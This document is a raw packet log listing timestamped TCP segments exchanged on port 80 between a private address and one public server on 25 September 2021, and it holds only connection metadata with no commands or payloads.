Sep 25, 2021 10:15:04.018978119 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018979073 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019027948 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019049883 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.019071102 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019109011 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019109964 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.019126892 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.019203901 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019253969 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019254923 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.019258976 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.019292116 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019320011 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.019324064 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.019330978 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019371033 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019409895 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019448042 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019488096 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019536972 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019581079 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019618988 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019658089 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019697905 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019736052 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019774914 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019814014 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019865036 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019907951 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019946098 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.019984007 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020021915 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020060062 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020100117 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020138025 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020185947 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020230055 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020267963 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020307064 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020345926 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020384073 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020422935 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020476103 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020505905 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020531893 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020555019 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020577908 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020601034 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020623922 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020648003 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020670891 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020699024 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020725965 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020747900 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020771027 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020793915 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020817041 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020840883 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020864010 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020891905 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.020917892 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.021631956 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021656990 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021661043 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021663904 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021667004 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021670103 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021672964 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021676064 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021678925 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021682024 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021684885 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021687984 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021691084 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021693945 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021697044 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021699905 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021703005 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021706104 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021709919 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021713018 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021716118 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021718979 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021722078 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021723986 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021728039 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021730900 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021733046 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021737099 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021740913 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021744013 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021748066 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021750927 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021754026 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021756887 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021759033 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021763086 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021765947 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021770000 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021773100 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021775961 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021779060 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021781921 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021785021 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021787882 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021791935 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021795034 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.021799088 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.023926973 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.024980068 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.038081884 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.038117886 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.038144112 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.038157940 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.038191080 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.038213968 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.038218021 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.038319111 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.038367033 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.038392067 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.038414001 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.038417101 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.038435936 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.038439989 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.038456917 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.038501024 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.038512945 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.038516998 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.038520098 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.038537979 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.038568020 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.038594007 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.038624048 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.038641930 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.038654089 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.038666010 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.038678885 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.038714886 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.038727045 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047489882 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047524929 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047549009 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047573090 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047574043 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047588110 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047591925 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047596931 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047621965 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047641993 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047643900 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047646046 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047671080 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047693968 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047694921 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047703028 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047715902 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047738075 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047746897 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047749996 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047760963 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047784090 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047785997 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047791958 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047807932 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047831059 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047838926 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047842979 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047856092 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047880888 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047904015 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047925949 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047934055 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047934055 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047936916 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047947884 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047950983 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047959089 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047976971 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.047980070 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.047996044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048012018 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048018932 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048023939 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048027039 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048043013 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048049927 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048054934 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048058033 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048077106 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048084021 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048094988 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048109055 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048125029 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048140049 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048152924 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048155069 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048156023 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048171043 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048186064 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048221111 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048226118 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048229933 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048233032 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048249960 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048264980 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048274040 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048284054 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048300982 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048315048 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048331976 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048338890 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048341036 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048343897 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048357964 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048369884 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048382044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048393011 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048393011 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048398018 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048413038 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048435926 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048444033 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048448086 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048456907 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048476934 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048491955 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048495054 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048497915 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048510075 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048525095 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048541069 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048552990 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048554897 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048557997 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048571110 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048587084 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048612118 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048618078 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048618078 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048623085 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048629999 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048645973 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048661947 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048665047 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048669100 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048677921 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048692942 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048708916 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048717022 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048721075 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048724890 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048741102 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048759937 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048767090 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048772097 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048777103 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048791885 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048806906 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048815966 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048820019 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048823118 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048839092 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048854113 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.048885107 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.048888922 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.049175978 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.060900927 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.060941935 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.060966969 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.060991049 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.061039925 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.061053038 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.061054945 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.061055899 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.061057091 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.061080933 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.061105967 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.061131954 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.061259985 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.061273098 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.061275959 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.061278105 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.063128948 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.063158989 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.063179016 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.063198090 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.063218117 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.063235044 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.063241005 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.063242912 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.063261986 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.063282013 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.063309908 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.063314915 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.063508034 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.072416067 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.072447062 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.072587013 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.072613001 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.072630882 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.072635889 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.072669983 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.072670937 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.072751999 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075170040 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075263023 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075314045 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075330019 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075354099 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075362921 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075378895 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075390100 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075396061 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075400114 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075418949 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075433016 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075443029 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075445890 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075463057 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075469971 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075475931 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075479031 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075495958 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075512886 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075532913 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075534105 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075537920 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075548887 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075570107 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075589895 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.075592041 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.075596094 CEST	49744	80	192.168.2.5	159.69.203.58
